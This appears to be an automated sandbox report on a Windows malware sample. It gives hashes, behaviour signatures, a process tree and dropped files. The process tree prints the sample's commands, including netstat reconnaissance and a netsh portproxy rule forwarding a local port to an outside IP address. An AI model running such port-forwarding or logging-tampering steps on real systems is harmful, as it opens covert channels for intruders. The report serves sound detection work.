Analysis

  • max time kernel
    66s
  • max time network
    147s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    19-03-2024 18:57

General

  • Target

    a3357e7ea44e4d30304b1e5a4f53da37c848ce10fda0bd03a4f0dc0c5220e336.exe

  • Size

    397KB

  • MD5

    6f593dbea0a8703af52bd66f582251a4

  • SHA1

    2201a210e9680ec079b08bdb1da6d23112d87dcc

  • SHA256

    a3357e7ea44e4d30304b1e5a4f53da37c848ce10fda0bd03a4f0dc0c5220e336

  • SHA512

    97ebc0b7f27a76efead93fce05a8d059b4c6629e6348d5d4b728ed910ab00848b44737c6b5a48ac070d62a1da9273fc72b809fcf36bd17afb573fccc33d5aa73

  • SSDEEP

    6144:rqJycjfxGqz7J1Bn+F7potY9kxqqJrNzS:rq8cj5fR+MO9kPJrhS

Score
8/10

Malware Config

Signatures

  • Sets file execution options in registry 2 TTPs 25 IoCs
  • Modifies powershell logging option 1 TTPs
  • Drops file in Windows directory 2 IoCs
  • Gathers network information 2 TTPs 3 IoCs

    Uses commandline utility to view network configuration.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a3357e7ea44e4d30304b1e5a4f53da37c848ce10fda0bd03a4f0dc0c5220e336.exe
    "C:\Users\Admin\AppData\Local\Temp\a3357e7ea44e4d30304b1e5a4f53da37c848ce10fda0bd03a4f0dc0c5220e336.exe"
    1⤵
    • Sets file execution options in registry
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1920
    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ekktuv8h.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3800
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5AE2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5AE1.tmp"
        3⤵
          PID:3512
      • C:\Windows\system32\chcp.com
        "C:\Windows\system32\chcp.com" 437
        2⤵
          PID:3588
        • C:\Windows\system32\netsh.exe
          "C:\Windows\system32\netsh.exe" interface portproxy show all
          2⤵
            PID:4064
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:2512
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:4388
          • C:\Windows\system32\NETSTAT.EXE
            "C:\Windows\system32\NETSTAT.EXE" -na
            2⤵
            • Gathers network information
            • Suspicious use of AdjustPrivilegeToken
            PID:1752
          • C:\Windows\system32\netsh.exe
            "C:\Windows\system32\netsh.exe" interface portproxy reset
            2⤵
              PID:4464
            • C:\Windows\system32\netsh.exe
              "C:\Windows\system32\netsh.exe" interface portproxy show all
              2⤵
                PID:2144
              • C:\Windows\system32\netsh.exe
                "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=5.133.65.53
                2⤵
                  PID:2720
                • C:\Windows\system32\netsh.exe
                  "C:\Windows\system32\netsh.exe" interface portproxy show all
                  2⤵
                    PID:4436
                  • C:\Windows\system32\netsh.exe
                    "C:\Windows\system32\netsh.exe" interface portproxy show all
                    2⤵
                      PID:4692
                  • C:\Windows\system32\msiexec.exe
                    C:\Windows\system32\msiexec.exe /V
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3092

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Temp\RES5AE2.tmp

                    Filesize

                    1KB

                    MD5

                    9ff61671f477cc5072a7485eb9a2f004

                    SHA1

                    8bfffd2605d038ac06b8e2910eb9601e41127949

                    SHA256

                    0b3db4a12b5da92c18b13d431d8a546807279154988a627ade6fe5f97fd5e6e8

                    SHA512

                    e9bf011bb5bf16eaa6627b5afa925ddbb38dabd004597911244914fa308e2e1ce0f69cb8cc32d54f7c476cc4dae88a2aa171518aaddaed63b7b1d0527101e4db

                  • C:\Users\Admin\AppData\Local\Temp\ekktuv8h.dll

                    Filesize

                    3KB

                    MD5

                    ed426e67ba83c25194b737513a3a9a00

                    SHA1

                    ebcd70aefed1d5e3c8b6fc841985e19ffdcbd831

                    SHA256

                    a432d0adc3ef80e4486c808ebefe2fada18e62ed0d57ea22c6beff5025cc981d

                    SHA512

                    a4edb33e540720087139693977cb32c3b5e508ebb7aa261a778c1f47d4b24172d1cb00f2608e086db11f2fe64b38e2c9096d68c71af31f0d5f94f76c94b92456

                  • C:\Users\Admin\AppData\Local\Temp\ekktuv8h.pdb

                    Filesize

                    11KB

                    MD5

                    f36a7bb475dd6b02e711581416761e95

                    SHA1

                    f15a1066818bdcdad8607f07eca44b4aa665bb5b

                    SHA256

                    6cd222d2f5a55192e3d1f4bc1ba43b10e4c774328456ab948229fa50d974c6fc

                    SHA512

                    63063156a41692b3ed08e131251f19b7084fa72bb380c233c9575d2f07a99a1a613545fdf892099d03521f2bedfb7168ccce486b468f2effb3292bb3a82edbd9

                  • C:\Windows\SoftwareDistribution\config.xml

                    Filesize

                    516B

                    MD5

                    92714417a26162d7918c9875c70f8ed9

                    SHA1

                    e017c2eb9e2aad8b8bf1f24e7411d28165242a7a

                    SHA256

                    1e6f789ba5f3d163e06cfe7caf54b366971ad5a0a5e54c8f76e3523a36f6a24f

                    SHA512

                    de27961363f22d8ee3f05cec3c32bd359b90c1ddac43f5dfa58b01d50c8195b24834568d6287726b74bda691bf1ab321790e61dd8eab225cebf1ecd107a676ed

                  • \??\c:\Users\Admin\AppData\Local\Temp\CSC5AE1.tmp

                    Filesize

                    652B

                    MD5

                    ba1de9c05a54ca17b9c7bf139416c350

                    SHA1

                    d07431ddf2c043edb1cebdb9d432524230632a1d

                    SHA256

                    5cddeb7fc74ac72f9cfaea395cd655e3cd2772317e3501b8f7405d380bc10b0c

                    SHA512

                    f6e1e54896e5d0aa043221dfb86ab7c2adbaa3b210018b4e66a7a1c361dc115626a212b9140e29cd938efc967b0bec3f4203cce02a1aed41237f335d64227dce

                  • \??\c:\Users\Admin\AppData\Local\Temp\ekktuv8h.0.cs

                    Filesize

                    447B

                    MD5

                    1640a04633fee0dfdc7e22c4f4063bf6

                    SHA1

                    3cb525c47b5dd37f8ee45b034c9452265fba5476

                    SHA256

                    55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0

                    SHA512

                    85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

                  • \??\c:\Users\Admin\AppData\Local\Temp\ekktuv8h.cmdline

                    Filesize

                    309B

                    MD5

                    8e3e8829f3eab0f2f5f9397716eccab1

                    SHA1

                    c3f68d43630032cb6d65a78c1195c1bf11635b24

                    SHA256

                    14a2367fe856c72d31e39876008b73671856ac3011a580d2f25124013563d99f

                    SHA512

                    2c195d0452fa7796843cbc1a1d73527a7db50bda6ef886391315a0acf797ab8507032682bde513c8315cdaad52ddd0531629a04ca5eb1070af35e0214cbee9e0

                  • memory/1920-4-0x00000000012E0000-0x000000000137C000-memory.dmp

                    Filesize

                    624KB

                  • memory/1920-19-0x000000001CD80000-0x000000001CD88000-memory.dmp

                    Filesize

                    32KB

                  • memory/1920-3-0x00007FFC81BD0000-0x00007FFC82571000-memory.dmp

                    Filesize

                    9.6MB

                  • memory/1920-2-0x00000000013A0000-0x00000000013B0000-memory.dmp

                    Filesize

                    64KB

                  • memory/1920-0-0x000000001BD40000-0x000000001C20E000-memory.dmp

                    Filesize

                    4.8MB

                  • memory/1920-25-0x00007FFC81BD0000-0x00007FFC82571000-memory.dmp

                    Filesize

                    9.6MB

                  • memory/1920-26-0x00000000013A0000-0x00000000013B0000-memory.dmp

                    Filesize

                    64KB

                  • memory/1920-33-0x000000001DED0000-0x000000001DEE9000-memory.dmp

                    Filesize

                    100KB

                  • memory/1920-1-0x00007FFC81BD0000-0x00007FFC82571000-memory.dmp

                    Filesize

                    9.6MB

                  • memory/3800-10-0x00000000009A0000-0x00000000009B0000-memory.dmp

                    Filesize

                    64KB